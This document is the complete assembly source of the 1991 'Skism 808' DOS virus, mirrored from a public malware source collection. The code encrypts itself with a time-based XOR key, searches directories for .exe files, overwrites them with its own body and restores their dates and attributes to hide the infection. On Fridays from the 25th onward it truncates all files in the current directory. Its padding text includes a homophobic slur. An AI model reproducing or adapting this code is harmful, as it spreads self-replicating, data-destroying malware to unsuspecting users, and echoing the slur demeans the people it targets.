mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-18 08:15:27 +00:00
4b9382ddbc
push
306 lines
11 KiB
NASM
306 lines
11 KiB
NASM
|
||
;tHE sKISM 808 vIRUS. cREATED 1991 BY sMART kIDS iNTO sICK mETHODS.
|
||
|
||
|
||
|
||
FILENAME equ 30 ;USED TO FIND FILE NAME
|
||
FILEATTR equ 21 ;USED TO FIND FILE ATTRIBUTES
|
||
FILEDATE equ 24 ;USED TO FIND FILE DATE
|
||
FILETIME equ 22 ;USED TO FIND FILE TIME
|
||
|
||
|
||
|
||
CODE_START equ 0100H ;START OF ALL .com FILES
|
||
VIRUS_SIZE equ 808 ;tr 808
|
||
|
||
|
||
CODE SEGMENT 'CODE'
|
||
ASSUME CS:CODE,DS:CODE,ES:CODE
|
||
ORG CODE_START
|
||
|
||
MAIN PROC NEAR
|
||
|
||
JMP VIRUS_START
|
||
|
||
ENCRYPT_VAL DB 00H
|
||
|
||
VIRUS_START:
|
||
|
||
CALL ENCRYPT ;ENCRYPT/DECRYPT FILE
|
||
JMP VIRUS ;GO TO START OF CODE
|
||
|
||
ENCRYPT:
|
||
|
||
PUSH CX
|
||
MOV BX,OFFSET VIRUS_CODE ;START ENCRYPTION AT DATA
|
||
|
||
XOR_LOOP:
|
||
|
||
MOV CH,[BX] ;READ CURRENT BYTE
|
||
XOR CH,ENCRYPT_VAL ;GET ENCRYPTION KEY
|
||
MOV [BX],CH ;SWITCH BYTES
|
||
INC BX ;MOVE BX UP A BYTE
|
||
CMP BX,OFFSET VIRUS_CODE+VIRUS_SIZE
|
||
;ARE WE DONE WITH THE ENCRYPTION
|
||
JLE XOR_LOOP ;NO? KEEP GOING
|
||
POP CX
|
||
RET
|
||
|
||
|
||
INFECTFILE:
|
||
|
||
MOV DX,CODE_START ;WHERE VIRUS STARTS IN MEMORY
|
||
MOV BX,HANDLE ;LOAD BX WITH HANDLE
|
||
PUSH BX ;SAVE HANDLE ON STACK
|
||
CALL ENCRYPT ;ENCRYPT FILE
|
||
POP BX ;GET BACK BX
|
||
MOV CX,VIRUS_SIZE ;NUMBER OF BYTES TO WRITE
|
||
MOV AH,40H ;WRITE TO FILE
|
||
INT 21H ;
|
||
PUSH BX
|
||
CALL ENCRYPT ;FIX UP THE MESS
|
||
POP BX
|
||
RET
|
||
|
||
VIRUS_CODE:
|
||
|
||
WILDCARDS DB "*",0 ;SEARCH FOR DIRECTORY ARGUMENT
|
||
FILESPEC DB "*.exe",0 ;SEARCH FOR exe FILE ARGUMENT
|
||
FILESPEC2 DB "*.*",0
|
||
ROOTDIR DB "\",0 ;ARGUMENT FOR ROOT DIRECTORY
|
||
DIRDATA DB 43 DUP (?) ;HOLDS DIRECTORY dta
|
||
FILEDATA DB 43 DUP (?) ;HOLDS FILES dta
|
||
DISKDTASEG DW ? ;HOLDS DISK DTA SEGMENT
|
||
DISKDTAOFS DW ? ;HOLDS DISK DTA OFFSET
|
||
TEMPOFS DW ? ;HOLDS OFFSET
|
||
TEMPSEG DW ? ;HOLDS SEGMENT
|
||
DRIVECODE DB ? ;HOLDS DRIVE CODE
|
||
CURRENTDIR DB 64 DUP (?) ;SAVE CURRENT DIRECTORY INTO THIS
|
||
HANDLE DW ? ;HOLDS FILE HANDLE
|
||
ORIG_TIME DW ? ;HOLDS FILE TIME
|
||
ORIG_DATE DW ? ;HOLDS FILE DATE
|
||
ORIG_ATTR DW ? ;HOLDS FILE ATTR
|
||
IDBUFFER DW 2 DUP (?) ;HOLDS VIRUS ID
|
||
|
||
VIRUS:
|
||
|
||
MOV AX,3000H ;GET DOS VERSION
|
||
INT 21H ;
|
||
CMP AL,02H ;IS IT AT LEAST 2.00?
|
||
JB BUS1 ;WON'T INFECT LESS THAN 2.00
|
||
MOV AH,2CH ;GET TIME
|
||
INT 21H ;
|
||
MOV ENCRYPT_VAL,DL ;SAVE M_SECONDS TO ENCRYPT VAL SO
|
||
;THERES 100 MUTATIONS POSSIBLE
|
||
SETDTA:
|
||
|
||
MOV DX,OFFSET DIRDATA ;OFFSET OF WHERE TO HOLD NEW DTA
|
||
MOV AH,1AH ;SET DTA ADDRESS
|
||
INT 21H ;
|
||
|
||
NEWDIR:
|
||
|
||
MOV AH,19H ;GET DRIVE CODE
|
||
INT 21H ;
|
||
MOV DL,AL ;SAVE DRIVECODE
|
||
INC DL ;ADD ONE TO DL, BECAUSE FUNCTIONS DIFFER
|
||
MOV AH,47H ;GET CURRENT DIRECTORY
|
||
MOV SI, OFFSET CURRENTDIR ;BUFFER TO SAVE DIRECTORY IN
|
||
INT 21H ;
|
||
|
||
MOV DX,OFFSET ROOTDIR ;MOVE DX TO CHANGE TO ROOT DIRECTORY
|
||
MOV AH,3BH ;CHANGE DIRECTORY TO ROOT
|
||
INT 21H ;
|
||
|
||
SCANDIRS:
|
||
|
||
MOV CX,13H ;INCLUDE HIDDEN/RO DIRECTORYS
|
||
MOV DX, OFFSET WILDCARDS ;LOOK FOR '*'
|
||
MOV AH,4EH ;FIND FIRST FILE
|
||
INT 21H ;
|
||
CMP AX,12H ;NO FIRST FILE?
|
||
JNE DIRLOOP ;NO DIRS FOUND? BAIL OUT
|
||
|
||
BUS1:
|
||
|
||
JMP BUS
|
||
|
||
DIRLOOP:
|
||
|
||
MOV AH,4FH ;FIND NEXT FILE
|
||
INT 21H ;
|
||
CMP AX,12H
|
||
JE BUS ;NO MORE DIRS FOUND, ROLL OUT
|
||
|
||
CHDIR:
|
||
|
||
MOV DX,OFFSET DIRDATA+FILENAME;POINT DX TO FCB - FILENAME
|
||
MOV AH,3BH ;CHANGE DIRECTORY
|
||
INT 21H ;
|
||
|
||
MOV AH,2FH ;GET CURRENT DTA ADDRESS
|
||
INT 21H ;
|
||
MOV [DISKDTASEG],ES ;SAVE OLD SEGMENT
|
||
MOV [DISKDTAOFS],BX ;SAVE OLD OFFSET
|
||
MOV DX,OFFSET FILEDATA ;OFFSET OF WHERE TO HOLD NEW DTA
|
||
MOV AH,1AH ;SET DTA ADDRESS
|
||
INT 21H ;
|
||
|
||
SCANDIR:
|
||
|
||
MOV CX,07H ;FIND ANY ATTRIBUTE
|
||
MOV DX,OFFSET FILESPEC ;POINT DX TO "*.com",0
|
||
MOV AH,4EH ;FIND FIRST FILE FUNCTION
|
||
INT 21H ;
|
||
CMP AX,12H ;WAS FILE FOUND?
|
||
JNE TRANSFORM
|
||
|
||
NEXTEXE:
|
||
|
||
MOV AH,4FH ;FIND NEXT FILE
|
||
INT 21H ;
|
||
CMP AX,12H ;NONE FOUND
|
||
JNE TRANSFORM ;FOUND SEE WHAT WE CAN DO
|
||
|
||
MOV DX,OFFSET ROOTDIR ;MOVE DX TO CHANGE TO ROOT DIRECTORY
|
||
MOV AH,3BH ;CHANGE DIRECTORY TO ROOT
|
||
INT 21H ;
|
||
MOV AH,1AH ;SET DTA ADDRESS
|
||
MOV DS,[DISKDTASEG] ;RESTORE OLD SEGMENT
|
||
MOV DX,[DISKDTAOFS] ;RESTORE OLD OFFSET
|
||
INT 21H ;
|
||
JMP DIRLOOP
|
||
|
||
|
||
BUS:
|
||
|
||
JMP ROLLOUT
|
||
|
||
TRANSFORM:
|
||
|
||
MOV AH,2FH ;TEMPORALLY STORE DTA
|
||
INT 21H ;
|
||
MOV [TEMPSEG],ES ;SAVE OLD SEGMENT
|
||
MOV [TEMPOFS],BX ;SAVE OLD OFFSET
|
||
MOV DX, OFFSET FILEDATA + FILENAME
|
||
|
||
MOV BX,OFFSET FILEDATA ;SAVE FILE...
|
||
MOV AX,[BX]+FILEDATE ;DATE
|
||
MOV ORIG_DATE,AX ;
|
||
MOV AX,[BX]+FILETIME ;TIME
|
||
MOV ORIG_TIME,AX ; AND
|
||
MOV AX,[BX]+FILEATTR ;
|
||
MOV AX,4300H
|
||
INT 21H
|
||
MOV ORIG_ATTR,CX
|
||
MOV AX,4301H ;CHANGE ATTRIBUTES
|
||
XOR CX,CX ;CLEAR ATTRIBUTES
|
||
INT 21H ;
|
||
MOV AX,3D00H ;OPEN FILE - READ
|
||
INT 21H ;
|
||
JC FIXUP ;ERROR - FIND ANOTHER FILE
|
||
MOV HANDLE,AX ;SAVE HANDLE
|
||
MOV AH,3FH ;READ FROM FILE
|
||
MOV BX,HANDLE ;MOVE HANDLE TO BX
|
||
MOV CX,02H ;READ 2 BYTES
|
||
MOV DX,OFFSET IDBUFFER ;SAVE TO BUFFER
|
||
INT 21H ;
|
||
|
||
MOV AH,3EH ;CLOSE FILE FOR NOW
|
||
MOV BX,HANDLE ;LOAD BX WITH HANDLE
|
||
INT 21H ;
|
||
|
||
MOV BX, IDBUFFER ;FILL BX WITH ID STRING
|
||
CMP BX,02EBH ;INFECTED?
|
||
JNE DOIT ;SAME - FIND ANOTHER FILE
|
||
|
||
|
||
FIXUP:
|
||
MOV AH,1AH ;SET DTA ADDRESS
|
||
MOV DS,[TEMPSEG] ;RESTORE OLD SEGMENT
|
||
MOV DX,[TEMPOFS] ;RESTORE OLD OFFSET
|
||
INT 21H ;
|
||
JMP NEXTEXE
|
||
|
||
|
||
DOIT:
|
||
|
||
MOV DX, OFFSET FILEDATA + FILENAME
|
||
MOV AX,3D02H ;OPEN FILE READ/WRITE ACCESS
|
||
INT 21H ;
|
||
MOV HANDLE,AX ;SAVE HANDLE
|
||
|
||
CALL INFECTFILE
|
||
|
||
;MOV AX,3EH ;CLOSE FILE
|
||
;INT 21H
|
||
|
||
ROLLOUT:
|
||
|
||
MOV AX,5701H ;RESTORE ORIGINAL
|
||
MOV BX,HANDLE ;
|
||
MOV CX,ORIG_TIME ;TIME AND
|
||
MOV DX,ORIG_DATE ;DATE
|
||
INT 21H ;
|
||
|
||
MOV AX,4301H ;RESTORE ORIGINAL ATTRIBUTES
|
||
MOV CX,ORIG_ATTR
|
||
MOV DX,OFFSET FILEDATA + FILENAME
|
||
INT 21H
|
||
;MOV BX,HANDLE
|
||
;MOV AX,3EH ;CLOSE FILE
|
||
;INT 21H
|
||
MOV AH,3BH ;TRY TO FIX THIS
|
||
MOV DX,OFFSET ROOTDIR ;FOR SPEED
|
||
INT 21H ;
|
||
MOV AH,3BH ;CHANGE DIRECTORY
|
||
MOV DX,OFFSET CURRENTDIR ;BACK TO ORIGINAL
|
||
INT 21H ;
|
||
MOV AH,2AH ;CHECK SYSTEM DATE
|
||
INT 21H ;
|
||
CMP CX,1991 ;IS IT AT LEAST 1991?
|
||
JB AUDI ;NO? DON'T DO IT NOW
|
||
CMP DL,25 ;IS IT THE 25TH?
|
||
JB AUDI ;NOT YET? QUIT
|
||
CMP AL,5 ;IS fRIDAY?
|
||
JNE AUDI ;NO? QUIT
|
||
MOV DX,OFFSET DIRDATA ;OFFSET OF WHERE TO HOLD NEW DTA
|
||
MOV AH,1AH ;SET DTA ADDRESS
|
||
INT 21H ;
|
||
MOV AH,4EH ;FIND FIRST FILE
|
||
MOV CX,7H ;
|
||
MOV DX,OFFSET FILESPEC2 ;OFFSET *.*
|
||
|
||
lOOPS:
|
||
|
||
INT 21H ;
|
||
JC AUDI ;ERROR? THEN QUIT
|
||
MOV AX,4301H ;FIND ALL NORMAL FILES
|
||
XOR CX,CX ;
|
||
INT 21H ;
|
||
MOV DX,OFFSET DIRDATA + FILENAME
|
||
MOV AH,3CH ;FUCK UP ALL FILES IN CURRENT DIR
|
||
INT 21H ;
|
||
JC AUDI ;ERROR? QUIT
|
||
MOV AH,4FH ;FIND NEXT FILE
|
||
JMP LOOPS ;
|
||
|
||
AUDI:
|
||
|
||
MOV AX,4C00H ;END PROGRAM
|
||
INT 21H ;
|
||
|
||
;tHE BELOW IS JUST TEXT TO PAD OUT THE VIRUS SIZE TO 808 BYTES. dON'T
|
||
;JUST CHANGE THE TEXT AND CLAIM THAT THIS IS YOUR CREATION.
|
||
|
||
|
||
WORDS_ DB "sKISM rYTHEM sTACK vIRUS-808. sMART kIDS iNTO sICK mETHODS",0
|
||
WORDS2 DB " dONT ALTER THIS CODE INTO YOUR OWN STRAIN, FAGGIT. ",0
|
||
WORDS3 DB " hr/sss nycITY, THIS IS THE FIFTH OF MANY, MANY MORE....",0
|
||
WORDS4 DB " yOU SISSYS.....",0
|
||
|
||
MAIN ENDP
|
||
CODE ENDS
|
||
END MAIN
|
||
|
||
|